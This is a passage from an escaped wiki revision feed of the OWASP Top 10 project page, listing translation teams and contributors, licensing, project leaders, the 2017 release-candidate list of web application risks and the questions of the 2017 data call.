&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235624</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235624"/>
				<updated>2017-11-19T22:39:03Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: trimming older news and events&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The OWASP Top 10 - 2017 will be available for download on &amp;lt;span style=&amp;quot;background:yellow;&amp;quot;&amp;gt;&amp;lt;b&amp;gt;20  November, 2017&amp;lt;/b&amp;gt;&amp;lt;/span&amp;gt;. We are asking for comments to be submitted on the project's [https://github.com/OWASP/Top10/issues GitHub issues].&lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license, so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Do we really need this - Neil Smithline - 19 November 2017 &lt;br /&gt;
{{Social Media Links}}&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
== What is the OWASP Top 10? ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 provides:&lt;br /&gt;
&lt;br /&gt;
* '''A list of the 10 Most Critical Web Application Security Risks'''&lt;br /&gt;
&lt;br /&gt;
For each Risk it provides:&lt;br /&gt;
* A description&lt;br /&gt;
* Example vulnerabilities&lt;br /&gt;
* Example attacks&lt;br /&gt;
* Guidance on how to avoid&lt;br /&gt;
* References to OWASP and other related resources&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_10/Mapping_to_WHID | OWASP Top 10 Mapped to the Web Hacking Incident Database]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_RC2_Final.pdf | OWASP Top 10 2017 RC2 - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Covering Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 RC2 Published&lt;br /&gt;
* [11 Jul 2017] OWASP Top 10 2017 – The appeal for data and opinions is still open&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
* [[User:T.Gigler | Torsten Gigler]]&lt;br /&gt;
&lt;br /&gt;
==Classifications==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-flagship-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-defenders-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_DOC.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2017 Release Candidate 2 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
RC2 is available for download [https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf from GitHub]. &lt;br /&gt;
&lt;br /&gt;
We have worked extensively to validate the methodology, obtained a great deal of data on over 114,000 apps, and obtained qualitative data via survey by 550 community members on the two new categories – insecure deserialization and insufficient logging and monitoring. &lt;br /&gt;
&lt;br /&gt;
We strongly urge for any corrections or issues to be made on the project's [https://github.com/OWASP/Top10/issues GitHub issue list].&lt;br /&gt;
&lt;br /&gt;
Through public transparency, we provide traceability and ensure that all voices are heard during this final month before publication.&lt;br /&gt;
&lt;br /&gt;
(We will be reaching out to translators shortly.)&lt;br /&gt;
&lt;br /&gt;
Andrew van der Stock&amp;lt;br/&amp;gt;&lt;br /&gt;
Brian Glas&amp;lt;br/&amp;gt;&lt;br /&gt;
Neil Smithline&amp;lt;br/&amp;gt;&lt;br /&gt;
Torsten Gigler&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Historical/Outdated Information - for historical reference only==&lt;br /&gt;
The 2017 OWASP Top 10 RC1 has been rejected. A [https://goo.gl/forms/ltbKrdYrp4Qdl7Df2 new survey for security professionals] and a [https://goo.gl/forms/tLgyvK9O74r7wMkt2 reopened data call] are now open. More details can be found on [https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html this blog post]. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The release candidate for public comment was published 10 April 2017 and can be [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf downloaded here.]. OWASP plans to release the final OWASP Top 10 - 2017 in July or August 2017 after a public comment period ending June 30, 2017.&lt;br /&gt;
&lt;br /&gt;
Constructive comments on this [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pdf OWASP Top 10 - 2017 Release Candidate] should be forwarded via email to the [https://lists.owasp.org/mailman/listinfo/Owasp-topten OWASP Top 10 Project Email List]. Private comments may be sent to [mailto:vanderaj@owasp.org Andrew van der Stock]. Anonymous comments are welcome. All non-private comments will be catalogued and published at the same time as the final public release. Comments recommending changes to the Top 10 should include a complete suggested list of changes, along with a rationale for each change. All comments should indicate the specific relevant page and section.&lt;br /&gt;
&lt;br /&gt;
This release of the OWASP Top 10 marks this project’s fourteenth year of raising awareness of the importance of application security risks. This release follows the 2013 update, whose main change was the addition of 2013-A9 Use of Known Vulnerable Components. We are pleased to see that since the 2013 Top 10 release, a whole ecosystem of both free and commercial tools have emerged to help combat this problem as the use of open source components has continued to rapidly expand across practically every programming language. The data also suggests the use of known vulnerable components is still prevalent, but not as widespread as before. We believe the awareness of this issue the Top 10 - 2013 generated has contributed to both of these changes.&lt;br /&gt;
&lt;br /&gt;
We also noticed that since CSRF was introduced to the Top 10 in 2007, it has dropped from a widespread vulnerability to an uncommon one. Many frameworks include automatic CSRF defenses which has significantly contributed to its decline in prevalence, along with much higher awareness with developers that they must protect against such attacks.&lt;br /&gt;
&lt;br /&gt;
For 2017, the OWASP Top 10 Most Critical Web Application Security Risks (in the Release Candidate) are:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management&lt;br /&gt;
* A3 Cross-Site Scripting (XSS)&lt;br /&gt;
* A4 Broken Access Control (As it was in 2004)&lt;br /&gt;
* A5 Security Misconfiguration&lt;br /&gt;
* A6 Sensitive Data Exposure&lt;br /&gt;
* A7 Insufficient Attack Protection (NEW)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities&lt;br /&gt;
* A10 Underprotected APIs (NEW)&lt;br /&gt;
&lt;br /&gt;
== 2017 Update Data Call Data ==&lt;br /&gt;
&lt;br /&gt;
DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
